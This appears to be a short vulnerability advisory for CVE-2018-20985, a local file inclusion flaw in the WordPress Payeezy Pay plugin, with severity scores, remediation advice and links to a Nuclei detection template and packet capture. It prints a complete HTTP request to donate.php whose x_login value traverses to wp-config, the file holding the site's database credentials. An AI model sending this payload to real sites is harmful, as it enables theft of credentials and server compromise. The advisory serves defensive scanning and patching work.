| Title | WordPress Payeezy Pay <=2.97 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | The vulnerability allows an attacker to include local files and execute arbitrary code on the server. |
| Remediation | Update to the latest version of WordPress Payeezy Pay plugin. |
| CVSS Score | 9.8 |
| EPSS Score | 0.42918 |
| CVE ID | CVE-2018-20985 |
| CWE ID | CWE-20 |
| Tags | cve cve2018 wordpress lfi plugin payeezy vuln |
WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 26
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
x_login=../../../wp-config
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-20985.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-20985.pcap
N/AN/A